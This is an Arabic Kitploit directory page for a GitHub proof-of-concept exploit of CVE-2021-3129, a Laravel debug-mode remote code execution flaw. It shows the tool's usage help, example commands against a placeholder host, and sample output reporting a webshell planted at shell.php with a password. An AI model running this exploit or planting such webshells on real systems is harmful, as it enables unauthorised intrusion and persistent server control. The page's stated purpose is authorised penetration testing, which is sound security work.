Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-3129-exp — Laravel Debug mode ثغرة RCE (CVE-2021-3129) poc / exp | Kitploit
أدوات/GitHubGitHub/ajisai-babu/cve-2021-3129-exp
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubajisai-babu/cve-2021-3129-exp

CVE-2021-3129-exp

Laravel Debug mode ثغرة RCE (CVE-2021-3129) poc / exp

عرض المستودع
131منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة RCE في وضع التصحيح Laravel (CVE-2021-3129) poc / exp

CVE-2021-3129 exp / poc

  • ملاحظة ⚠️: نظرًا لأن استغلال الثغرة واكتشافها يرسلان طلبات متعددة، فقد يؤدي ذلك إلى بطء عملية الاستغلال والاكتشاف
  • الاستخدام:
root@kitploit:~
python CVE-2021-3129.py
usage: python CVE-2021-3129.py -u [url] --exp

وضع التصحيح Laravel RCE (CVE-2021-3129) POC & EXP

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     تحديد عنوان URL الهدف
  -e, --exp             استغلال الثغرة لكتابة webshell، إذا لم تحدده، فسيتم فقط الكشف عن الثغرة
  -p PROXY, --proxy PROXY
                        تعيين وكيل، مثل socks5://127.0.0.1:7890
  • مثال:
root@kitploit:~
# اختبار الثغرة (PoC)
python CVE-2021-3129.py -u http://xxxxx.com 
[✅] تم اكتشاف الثغرة! [🚩]url: http://xxxxx.com [❇️معلومات] إصدار PHP: 7.4.14 مسار الموقع: /var/www/html عنوان الخادم: 172.17.0.2 إصدار النظام: Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64

# استغلال (Exp)
python CVE-2021-3129.py -u http://xxxxx.com --exp                     
[✅] تم اكتشاف الثغرة! [🚩]url: http://xxxxx.com [❇️معلومات] إصدار PHP: 7.4.14 مسار الموقع: /var/www/html عنوان الخادم: 172.17.0.2 إصدار النظام: Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64 
[OK] تم كتابة webshell بنجاح، رابط الوصول: http://xxxxx.com/shell.php، كلمة المرور: whoami

# وكيل
python CVE-2021-3129.py -u http://xxxxx.com/ -p socks5://127.0.0.1:7890
python CVE-2021-3129.py -u http://xxxxx.com/ --exp -p socks5://127.0.0.1:7890
  • روابط مرجعية

    • https://mp.weixin.qq.com/s/k08P2Uij_4ds35FxE2eh0g
    • https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
    • https://github.com/nth347/CVE-2021-3129_exploit
    • https://github.com/ambionics/phpggc
  • إرشادات الاستخدام

    • هذه الأداة مخصصة فقط لأنشطة بناء الأمان المُرخَّصة قانونيًا للمؤسسات. عند استخدام هذه الأداة للكشف، يجب عليك التأكد من أن هذا النشاط يتوافق مع القوانين واللوائح المحلية وأنك حصلت على التفويض الكافي.
    • إذا قمت بأي سلوك غير قانوني أثناء استخدام هذه الأداة، فإنك تتحمل العواقب المقابلة بنفسك.
تنزيل الأداة